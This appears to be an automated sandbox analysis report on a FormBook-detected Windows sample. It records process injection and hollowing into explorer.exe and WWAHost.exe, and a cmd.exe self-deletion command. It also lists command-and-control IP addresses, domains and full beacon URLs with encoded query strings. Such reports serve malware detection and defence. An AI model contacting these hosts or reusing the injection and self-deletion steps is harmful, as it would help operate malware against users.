            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03182581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0318A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03152D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03181DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03181DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03181DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031861A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031835A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0321FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03208DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0315B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031E41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_0316D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_031D6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 6_2_03211C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 52.116.52.25 80
            Source: C:\Windows\explorer.exeNetwork Connect: 107.180.50.162 80
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.26.55 80
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.0.218 80
            Source: C:\Windows\explorer.exeNetwork Connect: 66.96.147.112 80
            Source: C:\Windows\explorer.exeNetwork Connect: 5.181.218.55 80
            Source: C:\Windows\explorer.exeNetwork Connect: 219.94.203.152 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 67.205.105.239 80
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.244 80
            Source: C:\Windows\explorer.exeNetwork Connect: 104.18.45.60 80
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeMemory written: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 380000
            Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exeProcess created: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe'
            Source: explorer.exe, 00000002.00000002.1028905228.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.679763405.0000000001080000.00000002.00000001.sdmp, WWAHost.exe, 00000006.00000002.1031199157.0000000005950000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000002.00000000.696503730.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339360 Sample: JdtN8nIcLi8RQOi.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 32 www.nipseythegreat.com 2->32 34 g.msn.com 2->34 46 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 6 other signatures 2->52 11 JdtN8nIcLi8RQOi.exe 3 2->11         started        signatures3 process4 file5 30 C:\Users\user\...\JdtN8nIcLi8RQOi.exe.log, ASCII 11->30 dropped 62 Tries to detect virtualization through RDTSC time measurements 11->62 64 Injects a PE file into a foreign processes 11->64 15 JdtN8nIcLi8RQOi.exe 11->15         started        signatures6 process7 signatures8 66 Modifies the context of a thread in another process (thread injection) 15->66 68 Maps a DLL or memory area into another process 15->68 70 Sample uses process hollowing technique 15->70 72 Queues an APC in another process (thread injection) 15->72 18 explorer.exe 15->18 injected process9 dnsIp10 36 www.promanconsortium.com 192.185.0.218, 49777, 80 UNIFIEDLAYER-AS-1US United States 18->36 38 www.bimetalthermostatksd.com 52.116.52.25, 49759, 49782, 80 SOFTLAYERUS United States 18->38 40 20 other IPs or domains 18->40 54 System process connects to network (likely due to code injection or exploit) 18->54 22 WWAHost.exe 12 18->22         started        signatures11 process12 dnsIp13 42 www.animaliaartist.com 22->42 44 animaliaartist.com 22->44 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 26 cmd.exe 1 22->26         started        signatures14 process15 process16 28 conhost.exe 26->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            JdtN8nIcLi8RQOi.exe22%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            JdtN8nIcLi8RQOi.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            www.eldritchparadox.com0%VirustotalBrowse
            www.straightlineautoserviceerie.net0%VirustotalBrowse
            www.bimetalthermostatksd.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.cmoorestudio.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd0%Avira URL Cloudsafe
            http://www.promanconsortium.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe0%Avira URL Cloudsafe
            http://www.maconanimalexterminator.com/ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG0%Avira URL Cloudsafe
            http://www.restaurantsilhouette.com/ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.pelisplusxd.net/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t80%Avira URL Cloudsafe
            http://www.nolarapper.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE20%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC0%Avira URL Cloudsafe
            http://www.central-car-sales.com/ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG0%Avira URL Cloudsafe
            http://www.allismd.com/ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG0%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.eldritchparadox.com/ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG0%Avira URL Cloudsafe
            http://www.profille-sarina23tammara.club/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf0%Avira URL Cloudsafe
            http://www.searchvity.com/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.eldritchparadox.com
            66.96.147.112
            truetrueunknown
            www.straightlineautoserviceerie.net
            104.18.45.60
            truetrueunknown
            nolarapper.com
            34.102.136.180
            truetrue
              unknown
              www.central-car-sales.com
              219.94.203.152
              truetrue
                unknown
                www.bimetalthermostatksd.com
                52.116.52.25
                truetrueunknown
                www.profille-sarina23tammara.club
                198.54.117.244
                truetrue
                  unknown
                  restaurantsilhouette.com
                  34.102.136.180
                  truetrue
                    unknown
                    allismd.com
                    5.181.218.55
                    truetrue
                      unknown
                      maconanimalexterminator.com
                      107.180.50.162
                      truetrue
                        unknown
                        cmoorestudio.com
                        34.102.136.180
                        truetrue
                          unknown
                          www.pelisplusxd.net
                          104.21.26.55
                          truetrue
                            unknown
                            animaliaartist.com
                            67.205.105.239
                            truetrue
                              unknown
                              www.promanconsortium.com
                              192.185.0.218
                              truetrue
                                unknown
                                www.animaliaartist.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.nolarapper.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.allismd.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.qoo10online.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        g.msn.com
                                        unknown
                                        unknownfalse
                                          high
                                          www.nipseythegreat.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.restaurantsilhouette.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.maconanimalexterminator.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.cmoorestudio.com
                                                unknown
                                                unknowntrue
                                                  unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.cmoorestudio.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQdtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.promanconsortium.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUetrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.maconanimalexterminator.com/ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLGtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.restaurantsilhouette.com/ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLGtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.pelisplusxd.net/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.nolarapper.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/COtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.bimetalthermostatksd.com/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.central-car-sales.com/ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLGtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.allismd.com/ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLGtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.eldritchparadox.com/ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLGtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.profille-sarina23tammara.club/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYftrue
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.tiro.comexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmpfalse
                                                              high
